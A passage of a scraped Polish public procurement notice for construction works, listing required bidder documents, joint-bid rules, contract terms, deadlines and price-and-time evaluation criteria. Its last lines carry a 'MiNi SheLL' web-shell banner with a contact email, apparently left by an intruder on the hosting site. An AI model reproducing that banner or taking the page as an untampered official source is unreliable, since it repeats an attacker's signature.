Pzp, Wykonawca przedstawia – wraz z oświadczeniem, o<br/>którym mowa w ust. 1 pkt 1 – oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw do wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu – w<br/>zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik Nr 2 do SWZ).<br/>5. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa<br/>w ust. 1 pkt 4, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz<br/>danych, o ile Wykonawca wskazał dane umożliwiające dostęp<br/>do tych dokumentów.<br/>6. Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie – nie krótszym niż<br/>5 dni od dnia wezwania – aktualnych na dzień złożenia następujących podmiotowych środków<br/>dowodowych:<br/>1) w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>zdolności technicznej lub zawodowej – wykazu osób skierowanych przez Wykonawcę do realizacji<br/>zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia<br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie<br/>do dysponowania tymi osobami (wzór Wykazu osób stanowi Załącznik Nr 6<br/>do SWZ).<br/>Wymagania Zamawiającego w zakresie zdolności technicznej lub zawodowej Wykonawcy zostały<br/>określone w ust. 1 pkt 2 lit. d Działu X SWZ<br/>Ogłoszenie nr 2021/BZP 00224758/01 z dnia 2021-10-07<br/>2021-10-07 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>2) w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o<br/>udzielenie zamówienia publicznego:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r., poz. 275), z innym wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego<br/>do tej samej grupy kapitałowej (wzór oświadczenia stanowi Załącznik<br/>Nr 5 do SWZ);<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie<br/>art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4) w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania – odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>5) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy albo Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo<br/>podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp – jeżeli<br/>umocowanie do reprezentowania przez osobę działającą w imieniu Wykonawcy albo Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo podmiotu<br/>udostępniającego zasoby nie wynika z dokumentów, o których mowa w pkt 4 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2. Do oferty wspólnej winno być dołączone pełnomocnictwo lub inny dokument potwierdzający<br/>umocowanie do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>3. Korespondencja w postępowaniu będzie prowadzona z podmiotem występującym jako<br/>pełnomocnik.<br/>4. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki<br/>udziału w postępowaniu, określone w ust. 1 pkt 2 lit. d Działu X SWZ, musi spełniać co najmniej<br/>jeden Wykonawca.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wskazanych w ust. 1 pkt 2 lit. d Działu X SWZ, Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy<br/>wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, w którym<br/>należy wskazać, które usługi wykonają poszczególni Wykonawcy. Druk oświadczenia stanowi<br/>Załącznik Nr 7 do SWZ.<br/>7. Każdy z Wykonawców wspólnie ubiegających się o zamówienie odrębnie składa<br/>oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp (Załącznik Nr 2 do SWZ).<br/>Oświadczenia te należy złożyć wraz z ofertą.<br/>8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy.<br/>9. W przypadku wyboru oferty Wykonawców wnoszących ją wspólnie, Zamawiający zażąda<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej<br/>współpracę tych Wykonawców.<br/>10. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań<br/>dotyczących przedmiotowej usługi <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz opis warunków ich wprowadzenia zostały określone w<br/>dokumentach zamówienia (w Dziale XVII SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na miniPortalu (https://miniportal.uzp.gov.pl/) oraz na ePUAP (https://epuap.gov.pl/wps/portal lub https://obywatel.gov.pl/nforms/ezamowienia).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-05 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-04</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1) CENA – 60 %,<br/>2) TERMIN WYKONANIA ZAMÓWIENIA – 40 %.

Creat By MiNi SheLL
Email: jattceo@gmail.com